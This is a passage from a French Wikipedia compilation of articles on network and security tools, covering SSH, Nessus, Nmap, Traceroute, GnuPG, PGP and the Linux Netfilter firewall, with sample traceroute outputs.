La version 2 qui était à l'état de draft jusqu'en janvier 2006 est déjà largement utilisée à travers le monde. Cette version est beaucoup plus sûre au niveau cryptographique, et possède en plus un protocole de transfert de fichiers complet, le SSH file transfer protocol. Habituellement le protocole SSH utilise le port TCP 22. Il est particulièrement utilisé pour ouvrir un shell sur un ordinateur distant. Peu utilisé sur les stations Windows (quoiqu'on puisse l'utiliser avec PuTTY, mRemote, cygwin ou encore OpenSSH), SSH fait référence pour l'accès distant sur les stations Linux et Unix. SSH peut également être utilisé pour transférer des ports TCP d'une machine vers une autre, créant ainsi un tunnel. Cette méthode est couramment utilisée afin de sécuriser une connexion qui ne l'est pas (par exemple le protocole de récupérations de courrier électronique POP3) en la faisant transférer par le biais du tunnel chiffré SSH. Il est également possible de faire plusieurs sauts entre consoles SSH, c'est-à-dire ouvrir une console sur un serveur, puis, de là, en ouvrir une autre sur un autre serveur.

Historique La première version de SSH (SSH-1) a été conçue par Tatu Ylönen, à Espoo, en Finlande en 1995. Il a créé le premier programme utilisant ce protocole et a ensuite créé une entreprise, SSH Communications Security pour exploiter cette innovation. Cette première version utilisait certains logiciels libres comme la bibliothèque Gnu libgmp, mais au fil du temps ces logiciels ont été remplacés par des logiciels propriétaires. SSH Communications Security a vendu sa licence SSH à F-Secure (anciennement connue sous le nom de Data Fellows). La version suivante a été nommée SSH-2. Le groupe de recherche de l'IETF « secsh » a défini en janvier 2006 le standard Internet SSH-2, que l'on retrouve actuellement dans la plupart des implémentations. Cette version permet une compatibilité ascendante avec les implémentations du draft de SSH-2 qui étaient en version 1.99.

SSH avec authentification par clés Avec SSH, l'authentification peut se faire sans l'utilisation de mot de passe ou de phrase secrète en utilisant la cryptographie asymétrique. La clé publique est distribuée sur les systèmes sur lesquels on souhaite se connecter. La clé privée, qu'on prendra le soin de protéger par un mot de passe, reste uniquement sur le poste à partir duquel on se connecte. L'utilisation d'un « agent ssh » permet de stocker le mot de passe de la clé privée pendant la durée de la session utilisateur. Cette configuration profite aussi à SCP et à SFTP qui se connectent au même serveur SSH.

Recommandations SSH V2 est définie par plusieurs recommandations : •• RFC 4251 : Architecture générale du protocole • RFC 4252 : Protocole d'authentification (PKI, par mot de passe ou par machine) • RFC 4253 : Protocole de transport sécurisé (Chiffrement, Signature numérique, intégrité) • RFC 4254 : Protocole de connexion (Port tunneling, Shell) Secure Shell 225

Implémentations logicielles • OpenSSH, le projet libre d'outils SSH. OpenSSH est l'implémentation ssh la plus utilisée, y compris par les distributions GNU/Linux. • Portable OpenSSH, une implémentation OpenSSH multiplate-forme. • lsh[2], une implémentation distribuée par le projet GNU selon les termes de la licence GNU GPL. • MacSSH[3], une implémentation lsh pour Mac OS classic 68k et PPC. • FRESH[4], une implémentation ssh en environnement JBoss. • SSHWindows[5], une implémentation pour Windows non maintenue. • Dropbear[6], une implémentation libre ayant pour but de remplacer OpenSSH sur les systèmes Unix ayant peu de ressources (processeur, mémoire, etc.) comme par exemple les systèmes embarqués.

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Secure_Shell& action=edit& section=0

[2] Implémentation GNU (http:/ / www. lysator. liu. se/ ~nisse/ lsh/ )

[3] MacSSH (http:/ / sourceforge. net/ projects/ macssh/ ) sur la plateforme SourceForge

[4] FRESH (https:/ / issues. jboss. org/ browse/ FRESH)

[5] SSHWindows (http:/ / sshwindows. sourceforge. net/ ) sur la plateforme SourceForge

[6] Dropbear (https:/ / matt. ucc. asn. au/ dropbear/ dropbear. html)

Nessus (logiciel)

Pour les articles homonymes, voir Nessus.

Nessus

Développeur Tenable Network Security

Dernière version [1] 5.0.1 (16 avril 2012) //fr.wikipedia.org/w/index.php?title=Modèle:Dernière_version_stable/Nessus_(logiciel)&action=edit +/- Environnement Multiplate-forme

Type Scanner de vulnérabilité

Licence propriétaire

Site web [2] nessus.org

[3] modifier

Nessus est un outil de sécurité informatique. Il signale les faiblesses potentielles ou avérées sur les machines testées. Ceci inclut, entre autres : •• les services vulnérables à des attaques permettant la prise de contrôle de la machine, l'accès à des informations sensibles (lecture de fichiers confidentiels par exemple), des dénis de service... •• les fautes de configuration (relais de messagerie ouvert par exemple) •• les patchs de sécurité non appliqués, que les failles corrigées soient exploitables ou non dans la configuration testée • les mots de passe par défaut, quelques mots de passe communs, et l'absence de mots de passe sur certains comptes systèmes. Nessus peut aussi appeler le programme externe Hydra pour attaquer les mots de passe à l'aide d'un dictionnaire. • les services jugés faibles (on suggère par exemple de remplacer Telnet par SSH) • les dénis de service contre la pile TCP/IP Nessus (logiciel) 226

Architecture et fonctionnement Nessus détecte les machines vivantes sur un réseau, balaie les ports ouverts, identifie les services actifs, leur version, puis tente diverses attaques. Nessus se divise en deux parties : nessusd qui est un daemon (service) exécutant les requêtes ainsi que la communication avec la cible, et nessus, une application client qui récupère les données et affiche le résultat. Ce découpage est classique, le daemon tournant avec des privilèges élevés (root) alors que l'interface graphique, plus complexe et donc vulnérable, tourne sous l'identité d'un utilisateur non privilégié. Les tests sont joués par des plugins ; quelques-uns sont en C compilé, mais la majorité sont écrits dans le langage de script NASL (Nessus Attack Scripting Language). La séquence des opérations est la suivante : 1. détection des machines vivantes sur le réseau par ping_host.nasl 2. « scan » des ports avec un des quatre analyseurs de ports internes, ou un scanner externe amap ou nmap, ce qui est déconseillé pour des raisons de performance. 3.3.récupération d'informations 1.1.type et version des divers services 2. Connexion (SSH, Telnet ou rsh) pour récupérer la liste des packages installés 4.4.attaques simples, peu agressives. Par exemple, directory traversal, test de relais de messagerie ouverts, etc. 5.5.attaques susceptibles d'être destructrices 6.6.dénis de service (contre les logiciels visés) 7.7.dénis de service contre la machine ou les équipements réseaux intermédiaires. Les dernières catégories de tests, plus agressives, peuvent avoir des conséquences désastreuses sur la disponibilité du système (crash de la machine visée, voire des équipements réseaux) et peuvent être désactivées dans le mode safe checks. Le logiciel client standard peut exporter les données sous divers formats (XML, HTML, LaTeX). Outre les failles, Nessus présente également diverses informations utiles à un auditeur comme la version des services ou du système d'exploitation.

Types de tests Nessus étant un scanner de sécurité réseau (par opposition aux outils locaux comme le grand ancêtre COPS), la présentation des failles a été longtemps biaisée en faveur des failles exploitables à distance. Toutefois, Nessus sait détecter les failles exploitables localement : • soit en identifiant un numéro de version dans une bannière, mais ce procédé est limité à une classe de failles particulière : les failles de services réseau exploitables seulement localement[4]. • soit en récupérant la liste des logiciels ou paquets installés sur la machine testée et en la comparant aux patchs publiés par les éditeurs. Ces tests locaux ont été introduits à partir de Nessus 2.2 [5]. Nessus (logiciel) 227

Licence Nessus est disponible sous licence GPL jusqu'à la version 2. Depuis la version 3, il est distribué sous licence propriétaire, mais toujours gratuit pour utilisation personnelle (Home Feed). La version 2 est maintenue. Il existe aussi un fork de Nessus 2 toujours sous licence GPL qui s'appelle OpenVAS.

Notes et références

[1] https:/ / discussions. nessus. org/ message/ 15110;jsessionid=CCB0180FE89A7D258E916046D8386EE3#15110

[2] http:/ / www. nessus. org

[3] http:/ / fr. wikipedia. org/ w/ index. php?title=Nessus_(logiciel)& action=edit& section=0

[4] Voir par exemple CVE-2003-0308 (http:/ / nvd. nist. gov/ nvd. cfm?cvename=CVE-2003-0308)

[5] http:/ / www. nessus. org/ documentation/ index. php?doc=ssh#WHAT. LOCAL. CHECKS. ARE

Nmap

Logo

Développeur Fyodor

Dernière version [1] 6.00 (21 mai 2012) //fr.wikipedia.org/w/index.php?title=Modèle:Dernière_version_stable/Nmap&action=edit +/- Environnements Multiplate-forme

Type Sécurité informatique

Licence GNU GPL

Site web [2] nmap.org

[3] modifier

Nmap est un scanner de ports open source créé par Fyodor et distribué par Insecure.org. Il est conçu pour détecter les ports ouverts, identifier les services hébergés et obtenir des informations sur le système d'exploitation d'un ordinateur distant. Ce logiciel est devenu une référence pour les administrateurs réseaux car l'audit des résultats de Nmap fournit des indications sur la sécurité d'un réseau. Il est disponible sous Windows, Mac OS X, Linux, BSD et Solaris. Le code source de Nmap est disponible sous la licence GNU GPL.

Fonctionnement Pour scanner les ports d'un ordinateur distant, Nmap utilise diverses techniques d'analyse qui s'appuient sur des protocoles tels que TCP, IP, UDP ou ICMP. De même, il se fonde sur les réponses qu'il obtient à des requêtes particulières pour obtenir une empreinte de la pile IP, souvent propre au système qui l'utilise. C'est par cette méthode qu'il peut reconnaitre la version d'un système d'exploitation ainsi que la version des services (aussi appelés daemons) en écoute. Nmap 228

Interface graphique NmapFE, écrite au départ par Zach Smith, était l'interface graphique officielle de Nmap pour les versions 2.2 à 4.22. À partir de la version 4.23 de Nmap, NmapFE a été remplacée par Zenmap, une nouvelle interface graphique fondée sur UMIT et développée par Adriano Monteiro Marques. D'autres interfaces sont disponibles, comme NmapSI4, qui s'appuie sur Qt. De nombreuses interfaces web sont également disponibles pour utiliser Nmap à partir d'un navigateur web. On peut citer LOCALSCAN, nmap-web et Nmap-CGI. Enfin, il existe des interfaces graphiques disponibles sous Microsoft Windows. On peut citer NMapWin, qui n'est pas mis à jour depuis la version v1.4.0, et NMapW développé par Syhunt.

Nmap et IPv6 Depuis 2002, Nmap ne prenait IPv6 en charge que pour les fonctionnalités les plus populaires. Depuis la version 6.0, publiée en mars 2012, Nmap prend complètement IPv6 en charge pour l'ensemble de ses fonctionnalités et pour toutes les plateformes sur lesquelles il fonctionne.

Apparitions dans les films Nmap étant un logiciel de plus en plus connu, on a pu voir des exemples d'utilisation dans plusieurs films[4]. Dans le second épisode de la trilogie Matrix (Matrix Reloaded à 1h47 et 50 secondes), Trinity se sert de nmap pour pirater la centrale électrique. Le troisième opus de la saga Jason Bourne, La Vengeance dans la peau, montre la CIA utiliser nmap ainsi que son interface graphique Zenmap pour s'introduire dans le serveur d'un journal (The Guardian). Nmap est présent dans le quatrième volet de la série des Die Hard, "Retour en enfer", où le hacker Matthew Farrel (Justin Long) l'utilise pour scanner une machine tout en chattant sur son ordinateur (au début du film). Nmap fait également une apparition dans le film 13 jeux de mort où une informaticienne utilise ce logiciel afin de pénétrer dans le serveur d'un site web à la 57ème minute.

Références

[1] http:/ / seclists. org/ nmap-hackers/ 2012/ 2

[2] http:/ / nmap. org

[3] http:/ / fr. wikipedia. org/ w/ index. php?title=Nmap& action=edit& section=0

[4] Movies featuring the Nmap Security Scanner (http:/ / nmap. org/ movies. html)

Annexes

Bibliographie • (en) Gordon Fyodor Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery

and Security Scanning (http:/ / nmap. org/ book/ ), Nmap Project, 2009 (ISBN 978-0-9799-5871-7) Nmap 229

Liens externes

• (en) Site officiel (http:/ / nmap. org/ )

• (fr) Nmap network security scanner (http:/ / nmap. org/ man/ fr/ )

• (fr) L'art du portscanning (http:/ / nmap. org/ art_of_portscanning-fr. html)

• (en) Nmap dans l'actualité (http:/ / nmap. org/ nmap_inthenews. html)

• (fr) Apprendre avec nmap (http:/ / www. linuxfocus. org/ Francais/ July2001/ article170. shtml)

• Portail des réseaux informatiques • Portail de la sécurité informatique • Portail des logiciels libres Traceroute

Traceroute (ou tracert sous Windows) est un programme utilitaire qui permet de suivre les chemins qu'un paquet de données (paquet IP) va prendre pour aller de la machine locale à une autre machine connectée au réseau IP. Il a été conçu au sein du laboratoire national Lawrence Berkeley.

Fonctionnement

Les paquets IP sont acheminés vers la destination en passant d'un Exemple de route réseau entre un poste client et routeur à un autre. Chaque routeur examine sa table de routage pour un serveur, passant par plusieurs routeurs déterminer le routeur suivant. Traceroute va permettre d'identifier les routeurs empruntés, indiquer le délai entre chacun des routeurs et les éventuelles pertes de paquets. Ces informations seront utiles pour diagnostiquer des problèmes de routage, comme des boucles, pour déterminer s'il y a de la congestion ou un autre problème sur un des liens vers la destination.

Le principe de fonctionnement de Traceroute consiste à envoyer des paquets UDP (certaines versions peuvent aussi utiliser TCP ou bien ICMP ECHO Request) avec un paramètre Time-To-Live (TTL) de plus en plus grand (en commençant à 1). Chaque routeur qui reçoit un paquet IP en décrémente le TTL avant de le transmettre. Lorsque le TTL atteint 0, le routeur émet un paquet ICMP d'erreur Time to live exceeded vers la source. Traceroute découvre ainsi les routeurs de proche en proche. Une fois le paquet sonde arrivé à sa destination finale, traceroute cesse de recevoir des TTL exceeded, et reçoit un paquet réponse ayant pour adresse IP source celle de l'interface de l'équipement sondé à travers laquelle est émis le paquet ICMP. Traceroute essaie volontairement de contacter un port invalide, donc le paquet réponse est normalement de type ICMP Port Unreachable. Si la machine destination avait par hasard un programme écoutant sur ce port, le comportement n'est pas certain et dépend du programme. Il existe cependant un certain nombre d'éléments qui peuvent compliquer l'interprétation du résultat : • le chemin suivi par les paquets peut être asymétrique et traceroute ne montre que l'aller ; •• le chemin suivi peut être radicalement différent depuis un autre point, même proche géographiquement ; •• les routeurs émettent le paquet ICMP avec l'adresse source de l'interface utilisée pour vous joindre, ce n'est pas forcément l'interface par laquelle votre paquet sonde est passé ; • les routeurs ne traitent pas nécessairement les paquets ICMP en transit de la même façon que le trafic de données. Les temps de réponse en cours de route peuvent ne pas refléter ceux que l'on observerait au niveau du trafic applicatif. Ce sera particulièrement le cas si le réseau fait usage de qualité de service et que le trafic sur certains liens approche la congestion. Traceroute 230

•• la création du paquet ICMP « TTL exceeded » est une opération complexe qui sollicite le CPU du routeur, alors que le trafic est habituellement traité au niveau du matériel spécialisé. Il se peut qu'un délai supplémentaire soit observé si le CPU est occupé à d'autres tâches plus essentielles (gestion des tables de routage, traitement des requêtes de gestion du réseau), alors que ce délai n'a pas d'effet sur le trafic de transit du routeur. •• un routeur peut ne pas répondre aux requêtes ICMP. Dans ce cas, on voit généralement des signes astérisques (*) sur les nœuds intermédiaires qui ne répondent pas aux requêtes ICMP. Il se peut aussi que, pour des raisons de performance, le routeur limite le nombre de paquets ICMP généré par unité de temps, ce qui cause l'apparition d'étoiles sur le parcours, qui ne sont cependant pas le symptôme d'un problème. • l'adresse IP de la réponse ICMP TTL Exceeded peut être privée (RFC 1918), et donc bloquée en cas de transit par Internet, ou impossible à identifier. Sous Windows, on utilise l'utilitaire tracert.

Exemple sous Unix % traceroute fr.wikipedia.org traceroute to rr.knams.wikimedia.org (145.97.39.155), 30 hops max, 38 byte packets 1 80.67.162.30 (80.67.162.30) 0.341 ms 0.300 ms 0.299 ms 2 telehouse2-gw.netaktiv.com (80.67.170.1) 5.686 ms 1.656 ms 0.428 ms 3 giga.gitoyen.net (80.67.168.16) 1.169 ms 0.704 ms 0.563 ms 4 62.4.73.27 (62.4.73.27) 2.382 ms 1.623 ms 1.297 ms 5 ge5-2.mpr2.cdg2.fr.above.net (64.125.23.86) 1.196 ms ge9-4.mpr2.cdg2.fr.above.net (64.125.23.102) 1.290 ms ge5-1.mpr2.cdg2.fr.above.net (64.125.23.82) 30.297 ms 6 so-5-0-0.cr1.lhr3.uk.above.net (64.125.23.13) 41.900 ms 9.658 ms 9.118 ms 7 so-7-0-0.mpr1.ams5.nl.above.net (64.125.27.178) 23.403 ms 23.209 ms 23.703 ms 8 64.125.27.221.available.above.net (64.125.27.221) 19.149 ms so-0-0-0.mpr3.ams1.nl.above.net (64.125.27.181) 19.378 ms 64.125.27.221.available.above.net (64.125.27.221) 20.017 ms 9 PNI.Surfnet.ams1.above.net (82.98.247.2) 16.834 ms 16.384 ms 16.129 ms 10 af-500.xsr01.amsterdam1a.surf.net (145.145.80.9) 21.525 ms 20.645 ms 24.101 ms 11 kncsw001-router.customer.surf.net (145.145.18.158) 20.233 ms 16.868 ms 19.568 ms 12 gi0-24.csw2-knams.wikimedia.org (145.97.32.29) 23.614 ms 23.270 ms 23.574 ms 13 rr.knams.wikimedia.org (145.97.39.155) 23.992 ms 23.050 ms 23.657 ms

On voit ici que le paquet a transité via Londres (« lhr » est le code international de l'aéroport d'Heathrow) avant d'être acheminé vers Amsterdam « ams ». Cette convention de nommage des routeurs, bien qu'assez répandue en pratique chez les opérateurs de télécommunications, n'est en aucun cas un standard ou une règle. Traceroute 231

Exemple sous Windows C:\WINDOWS>tracert fr.wikipedia.org

Détermination de l'itinéraire vers rr.lopar.wikimedia.org [212.85.150.132] avec un maximum de 30 sauts :

1 24 ms 22 ms 22 ms 1.32.202.62.cust.bluewin.ch [62.202.32.1] 2 22 ms 24 ms 22 ms 1.32.202.62.cust.bluewin.ch [62.202.32.1] 3 24 ms 23 ms 22 ms net481.bwrt2zhb.bluewin.ch [195.186.121.1] 4 314 ms 162 ms 22 ms net125.bwrt1inb.bluewin.ch [195.186.125.71] 5 34 ms 23 ms 24 ms if114.ip-plus.bluewin.ch [195.186.0.114] 6 27 ms 29 ms 29 ms i68geb-005-gig4-2.bb.ip-plus.net [138.187.130.158] 7 39 ms 39 ms 38 ms i00par-005-pos4-0.bb.ip-plus.net [138.187.129.34] 8 38 ms 320 ms 39 ms feth2-kara-ielo.freeix.net [213.228.3.203] 9 284 ms 39 ms 39 ms feth0-bestelle.tlcy.fr.core.ielo.net [212.85.144.6] 10 90 ms 158 ms 83 ms chloe.wikimedia.org [212.85.150.132]

Itinéraire déterminé.

Le client avec l'adresse IP 62.202.32.1 se connecte au serveur wikipedia en passant par différents routeurs.

GNU Privacy Guard

Cet article est une ébauche concernant un logiciel libre. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

GnuPG

Développeur Projet GNU

Dernière version [] 2.0.20 (le 10 mai 2013 ) //fr.wikipedia.org/w/index.php?title=Modèle:Dernière_version_stable/GNU_Privacy_Guard&action=edit +/- Environnements Multiplateforme

Type Cryptographie

Licence GNU GPL

Site web [1] (en) Site officiel

[2] modifier

GnuPG (ou GPG, de l'anglais GNU Privacy Guard) est l'implémentation GNU du standard OpenPGP défini dans la RFC 4880[3]. Il est distribué selon les termes de la GNU GPL. GNU Privacy Guard 232

Il permet à ses utilisateurs de transmettre des messages signés ou chiffrés. Cela permet ainsi de garantir l'authenticité dans le premier cas ou, dans le second cas, la confidentialité du message.

Historique Le projet est initié à la fin des années 1990 par Werner Koch dans le but de remplacer la suite PGP de logiciels cryptographiques (plus précisément, de cryptographie asymétrique) par une alternative en logiciel libre. Il a pour cela bénéficié d'un financement important de la part du ministère fédéral de l'Économie ( Allemagne)[4]. La première version stable est réalisée le 7 septembre 1999[5].

Utilisation GnuPG est un logiciel très stable, apte à la production. Ainsi, il est généralement inclus d'origine dans les systèmes d'exploitation libres, comme les BSD ou GNU/Linux. Bien que le logiciel GnuPG soit doté d'une interface en ligne de commande, plusieurs applications ou plugins lui fournissent une interface graphique ; par exemple, il a été intégré entre autres à Mozilla Firefox et Mozilla Thunderbird via Enigmail, ou encore à KMail, le client de messagerie fourni avec KDE et enfin à Mail.app, le client de messagerie Mac OS X via GPGMail. Il est également disponible sous Microsoft Windows depuis la réalisation en 2005 de la suite logicielle Gpg4win (en).

Caractéristiques Le risque principal de GnuPG, comme pour tous les procédés de chiffrement à clé publique, est que la clé privée doit être enregistrée quelque part. Si c'est sur une clef USB que l'on garde avec soi, les risques de perte, de vol ou de copie existent. Si elle se trouve sur le disque dur d'un ordinateur, on est alors exposé aux risques classiques du piratage. Notons qu'une phrase (ou mot) de passe, optionnelle mais pouvant protéger la clé privée, limite alors les risques. Depuis sa version 2.0, GnuPG peut être installé sur une carte à puce. La clé privée est alors protégée par le code PIN de la carte, ce qui permet d'en améliorer sensiblement la confidentialité.

Articles connexes •• Cryptographie asymétrique •• Signature numérique •• Key signing party •• Toile de confiance •• Libgcrypt • Enigmail : client graphique pour SeaMonkey et Mozilla Thunderbird. GNU Privacy Guard 233

Notes et références

[1] http:/ / www. gnupg. org/

[2] http:/ / fr. wikipedia. org/ w/ index. php?title=GNU_Privacy_Guard& action=edit& section=0

Liens externes

• (fr) Site officiel (http:/ / www. gnupg. org/ index. fr. html)

• (en) GnuPG (http:/ / directory. fsf. org/ wiki/ Gnupg_(GPG)) sur le répertoire du logiciel libre.

• (fr) Introduction à GnuPG (http:/ / www. francoz. net/ doc/ gpg/ )

• (fr) Gnu Privacy Guard Mini Howto (un peu ancien) (http:/ / www. gnupg. org/ howtos/ fr/ )

• (fr) GnuPG HOWTO (http:/ / gpglinux. free. fr/ )

• (fr) Chiffrer ses emails avec GnuPG (http:/ / www. malekal. com/ 2010/ 11/ 12/ chiffrercrypter-sesemails/ )

• Portail de la cryptologie • Portail de la sécurité informatique • Portail des logiciels libres Pretty Good Privacy

« PGP » redirige ici. Pour les autres significations, voir PGP (homonymie). Pretty Good Privacy (en français : « Assez Bonne Intimité » ou « Assez Bonne Vie privée »), plus connu sous son sigle PGP est un logiciel de chiffrement et de déchiffrement cryptographique, créé par l'américain Phil Zimmermann en 1991. PGP garantit la confidentialité et l'authentification pour la communication des données. Il est souvent utilisé pour la signature de données, le chiffrement et le déchiffrement des textes, des e-mails, fichiers, répertoires et partitions de disque entier pour accroître la sécurité des communications par courriel. Utilisant la cryptographie asymétrique mais également la cryptographie symétrique, il fait partie des logiciels de cryptographie hybride. PGP et les produits similaires suivent le standard OpenPGP (RFC 4880[1]) pour le chiffrement et le déchiffrement de données.

Origine Philip Zimmermann, son développeur, a mis PGP en téléchargement libre en 1991. Violant de façon subtile les restrictions à l'exportation pour les produits cryptographiques (il avait été placé sur un site web américain d'où il était possible de le télécharger depuis n'importe où), PGP a été très mal accueilli par le gouvernement américain, qui a ouvert une enquête en 1993 — abandonnée en 1996, sans donner de raison. À l'époque où GnuPG, un logiciel libre compatible (car utilisant le même format OpenPGP), n'était pas encore très utilisé, PGP avait la réputation d'être le logiciel gratuit de cryptographie asymétrique le plus sûr au monde (en fait, PGP n'est pas un logiciel libre mais un « logiciel semi-libre »). Son code source étant ouvert (bien qu'il ne soit pas un logiciel libre), et étant toujours soutenu par son auteur Philip Zimmerman, il possède encore la confiance d'un grand nombre d'utilisateurs (en particulier envers la présence éventuelle de « portes dérobées » (en anglais : backdoors). Zimmermann souligne qu'il a développé PGP dans un souci de droit à la vie privée et de progrès démocratique : « PGP donne aux gens le pouvoir de prendre en main leur intimité. Il y a un besoin social croissant pour cela. C'est Pretty Good Privacy 234

pourquoi je l'ai créé. » Il explique aussi que : « si l'intimité est mise hors la loi, seuls les hors-la-loi auront une intimité. Les agences de renseignement ont accès à une bonne technologie cryptographique. De même les trafiquants d'armes et de drogue. Mais les gens ordinaires et les organisations politiques de base n'avaient pour la plupart pas eu accès à ces technologies cryptographiques de "qualité militaire" abordable. Jusqu'à présent. »

Fonctionnement Avec PGP, il devient possible de vérifier si un message provient bien de l'origine (via les signatures cryptographiques), ainsi que de chiffrer des messages afin qu'un seul destinataire puisse les lire. En bref, chaque utilisateur crée une paire de clés cryptographiques asymétriques (une publique, l'autre privée), et distribue la clé publique. Les signatures effectuées avec la clé privée peuvent être vérifiées utilisant la clé publique correspondante, et les messages chiffrés utilisant la clé publique sont déchiffrables en utilisant la clé privée correspondante.

Pourquoi utiliser PGP ? D'après Philip Zimmermann, extraits de son texte Pourquoi j’ai écrit PGP[2],[3] (1998) : « Si nous voulons résister à cette tendance perturbante du gouvernement de rendre illégale la cryptographie, une mesure que nous pouvons adopter est d’utiliser la cryptographie autant que nous le pouvons actuellement pendant que c’est encore légal. Quand l’utilisation de cryptographie sûre devient populaire, il est plus difficile pour le gouvernement de la criminaliser. Par conséquent, utiliser PGP est bon moyen pour préserver la démocratie. » « Que se passerait-il si tout le monde estimait que les citoyens honnêtes devraient utiliser des cartes postales pour leur courrier ? Si un non-conformiste s’avisait alors d’imposer le respect de son intimité en utilisant une enveloppe, cela attirerait la suspicion. Peut-être que les autorités ouvriraient son courrier pour voir ce que cette personne cache. » « De la même manière, ce serait excellent si tout le monde utilisait la cryptographie de manière systématique pour tous ses e-mails, qu’ils soient innocents ou non, de telle sorte que personne n’attirerait la suspicion en protégeant l’intimité de ses e-mails par la cryptographie. Pensez à le faire comme une forme de solidarité. »

Notes et références

[1] RFC 4880 (http:/ / tools. ietf. org/ html/ rfc4880) Netfilter 235 Netfilter

Netfilter

Logo

Développeur L'équipe Netfilter

Environnement GNU/Linux

Type Pare-feu

Licence GNU GPL

Site web http:/ / netfilter. org/

[1] modifier

Netfilter est un framework implémentant un pare-feu au sein du noyau Linux à partir de la version 2.4 de ce dernier. Il prévoit des accroches (hooks) dans le noyau pour l'interception et la manipulation des paquets réseau lors des appels des routines de réception ou d'émission des paquets des interfaces réseau.

La version 1.4.2 a reçu un Certificat de Sécurité de Premier Niveau (CSPN) par

l'Agence nationale de la sécurité des Relation entre certains modules de Netfilter systèmes d'information[2].

Histoire Le projet netfilter/iptables a été lancé en 1998 par Rusty Russell (en), qui était aussi l'auteur du programme précédent, ipchains. Bien que le projet ait grandi, il a fondé le Netfilter Core Team (ou simplement coreteam, équipe de développement principale) en 1999. Le logiciel qu'ils produisent (appelé netfilter à partir de maintenant) est sous la licence GNU General Public License (GPL), et a été intégré dans Linux 2.3 en mars 2000. En août 2003, Harald Welte a été fait président de la coreteam et, en avril 2004, suivant des recherches intensives du projet Netfilter dans des produits commerciaux qui ont distribué le logiciel sans respecter les termes de la licence, Harald Welte a réussi à obtenir une injonction historique contre Sitecom Allemagne qui a refusé de suivre les termes de la licence GPL. En septembre 2007, Patrick McHardy, qui a dirigé le développement de ces dernières années, a été élu nouveau président de la coreteam. Avant iptables, les principaux logiciels de création de pare-feu sur Linux étaient ipchains (noyau linux 2.2) et ipfwadm (noyau linux 2.0), basé sur ipfw, un programme initialement conçu sous BSDs. ipchains et ipfwadm a modifié le code réseau directement, afin de leur permettre de manipuler les paquets, comme il n'y avait pas de paquet-cadre de contrôle général jusqu'au Netfilter. Considérant que ipchains et ipfwadm combinaient le filtrage de paquets et NAT (en particulier les trois types de NAT, appelés le masquage, la transmission de port et la redirection), Netfilter sépare les opérations de paquets en plusieurs parties, décrites ci-dessous. Chacune se connecte à différents points d'accès dans les accroches Netfilter Netfilter 236

pour inspecter les paquets. Les sous-systèmes de connexion suivr (Connection Tracking) et de NAT sont plus généraux et plus puissants que les versions inférieures dans ipchains et ipfwadm.

iptables Article détaillé : iptables. Les modules du noyau nommés ip_tables, ip6_tables, arp_tables (les soulignements font partie du nom) et ebtables sont les systèmes des accroches de Netfilter. Ils fournissent un système basé sur des tableaux pour définir des règles de pare-feu qui filtrent les paquets ou les transforment. Les tableaux peuvent être administrés par les outils utilisateur iptables, ip6tables, arptables et ebtables, respectivement. Chaque tableau est en fait sa propre accroche, et chaque tableau a été créé pour servir un but précis. En ce qui concerne Netfilter, généralement l'exécution de ces tableaux dans un ordre précis par rapport aux autres tableaux. Toutefois, tous les tableaux vont exécuter la même fonction de traitement de tableau pour parcourir, et exécuter des règles. Les chaînes, à cet égard, correspondent à l'endroit où la pile de Netfilter a été invoquée, comme la réception de paquets (PREROUTING), rendu sur place (INPUT), transmise (FORWARD), généré localement (OUTPUT) et envoyer/envoyant des paquets (POSTROUTING). Les modules de Netfilter qui ne prévoient pas de tableaux (voir ci-dessous) peuvent également vérifier l'origine des paquets pour choisir leur mode de fonctionnement. • le module iptable_raw, lorsqu'il est chargé, peut enregistrer une accroche qui sera appelée avant toutes les autres accroches. Il fournit un tableau appelé raw que l'on peut utiliser pour filtrer des paquets avant qu'ils n'atteignent les opérations nécessitant plus de mémoire, comme Connection Tracking. • le module iptable_mangle enregistre une accroche et le tableau mangle, qui est consulté après Connection Tracking (mais toujours avant les autres tableaux), pour apporter des modifications au paquet, qui peuvent influencer d'autres règles, telles que le NAT ou le filtrage. • le module iptable_nat enregistre deux accroches : Les transformations de DNAT sont appliquées avant l'accroche de filtrage ; les transformations de SNAT sont appliquées ensuite. Le tableau nat qui est mis à la disposition de iptables est simplement une “base de données de configuration” pour les mappages NAT, et n'est destiné à aucun filtrage d'aucune sorte. • enfin, le module iptable_filter enregistre le tableau filter utilisé pour le filtrage général (firewall).

Connection Tracking Une des caractéristiques importantes construites sur le framework Netfilter est Connection Tracking. CT permet au noyau de garder la trace de toutes les connexions réseau logiques ou de sessions, et, par conséquent, porte tous les paquets qui composent cette connexion. NAT s'appuie sur cette information pour traduire tous les paquets de la même manière, et iptables peut utiliser cette information pour agir comme un pare-feu "stateful". L'état de connexion est cependant complètement indépendant de tout état haut niveau, tel que l'état TCP ou SCTP. Une partie de la raison en est que, lorsque les paquets ne font que transiter (pas de livraison locale), le moteur de TCP ne doit pas nécessairement être invoqué. Même les modes sans-connexion tels que les transmissions UDP, IPsec (AH/ESP), le GRE et autres protocoles de tunneling ont au moins un pseudo-état de connexion. L'heuristique de ces protocoles est souvent basée sur une valeur de délai de l'inactivité préréglée, après expiration de laquelle une connexion Netfilter est abandonnée. Chaque connexion Netfilter est identifiée de façon unique par un tuple (protocole de couche 3, adresse source, adresse de destination, protocole de couche 4, clé de couche 4). La clé de couche 4 dépend du protocole de transport : pour les protocoles TCP/UDP c'est le numéro de port; pour des tunnels, c'est leur tunnel ID. Dans le cas contraire, la clé prend la valeur zéro comme si elle ne faisait pas partie du tuple. Pour être capable d'inspecter le port TCP, les Netfilter 237

